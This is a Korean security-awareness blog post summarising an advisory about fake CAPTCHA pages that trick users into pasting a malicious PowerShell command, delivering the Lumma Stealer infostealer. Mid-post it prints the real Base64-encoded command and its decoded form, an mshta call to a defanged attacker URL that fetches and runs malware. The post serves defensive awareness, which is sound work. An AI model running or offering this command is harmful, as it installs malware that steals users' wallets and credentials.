가짜 캡차 인증 페이지를 이용해 악성코드 실행을 유도하는 공격 주의!
안녕하세요? 이스트시큐리티 시큐리티대응센터(이하 ESRC)입니다. 최근 사용자가 봇(bot)이 아닌 진짜 사람인지를 판단하기 위한 절차인 캡차 인증 페이지를 조작하여 악성코드 실행을 유도하는
blog.alyac.co.kr
캡차(CAPTCHA) 인증 페이지
- 사용자가 봇(bot)이 아닌 진짜 사람인지를 판단하기 위한 절차
- "Completely Automated Public Turning Test to Tell Humans Apart"(컴퓨터와 인간을 구분하기 위한 완전 자동화된 공개 튜링 테스트)의 약자
- 인간에게는 쉽지만 기계에게는 어려운 과제로 사용자를 테스트하여 사용자가 봇이 아니라 인간인지 검증하는 다양한 인증 방법
출처: [IBM] CAPTCHA란? (https://www.ibm.com/kr-ko/topics/captcha)
최근 캡차 인증 페이지를 조작하여 악성코드 실행을 유도하는 공격이 발견되고 있다.
해당 공격은 조작된 캡차 인증 페이지(상단 이미지)로 사용자를 유도하는 것으로 시작된다.
사용자가 불법적으로 공유된 버전의 게임을 다운로드하기 위해 검색한 링크를 통해 해당 캡차 인증 페이지로 리디렉션되거나 피싱 메일에 링크를 삽입하여 접속을 유도한다.
위 사진 속 [I'm not a robot] 버튼을 클릭 시,
사용자에게 "윈도우키+R" 키를 눌러 윈도우 실행 창을 오픈한 뒤 Ctrl+V 단축키로 클립보드에 복사된 악성 파워쉘 명령어를 붙여 넣어 실행하도록 유도하는 안내 메시지가 팝업된다.
페이지 내부에 삽입된 Base64로 인코딩된 악성 파워쉘 명령어는 위와 같은 스크립트를 통하여, 안내 메시지의 팝업과 동시에 클립보드에 복사된다.
사용자가 안내 메시지 내용대로 Verification Steps을 진행할 경우 위와 같이 악성 파워쉘 명령어가 실행된다.
파워쉘 명령어를 통해 공격자의 서버에서 악성코드를 다운받아 실행하게 된다.
실행된 악성 파워쉘 명령어의 내용은 다음과 같다.
powershell.exe -eC bQBzAGgAdABhACAAaAB0AHQAcABzADoALwAvAHYAZQByAGkAZgAuAGQAbAB2AGkAZABlAG8AcwBmAHIAZQAuAGMAbABpAGMAawAvADIAbgBkAGgAcwBvAHIAdQA=
디코딩 된 내용: mshta hxxps[:]//verif[.]dlvideosrfe[.]click/2ndhsoru
최종적으로 실행되는 악성코드는 Lumma Stealer로 확인되었다.
Lumma Stealer
- 감염된 컴퓨터에서 암호화폐 지갑, 웹브라우저 및 시스템정보, 사용자 계정정보 등과 같은 민감한 정보를 탈취하는 정보를 탈취하는 정보 탈취형 악성코드
사용자에게 직접 악성 명령어를 실행하도록 유도하는 공격기법이 익숙하고 신뢰하기 쉬운 캡차 인증페이지를 악용한 새로운 형태로 발견되고 있어 각별한 주의가 필요할 것으로 보인다.
'SWUFORCE > 기술 스터디' 카테고리의 다른 글
| [SAMSUNG SDS] 'AI 시대의 혁신과 기회'로 바라본 클라우드 시장 전망 (2) | 2024.11.12 |
|---|---|
| [Genians] Google Form과 NAC REST API를 이용한 IP 신청 (0) | 2024.11.03 |
| [삼성 SDS] IT 현대화를 통한 경쟁 우위 확보 전략 및 사례 분석 (2) | 2024.09.30 |
| [IGLOO] 지금 꼭 알아야 할 보안 ‘초자동화’로 가는 길 (6) | 2024.09.24 |
| [AhnLab] 조직 구성원 겨냥한 온라인 스캠, 어떤 것들이 있을까? (0) | 2024.05.28 |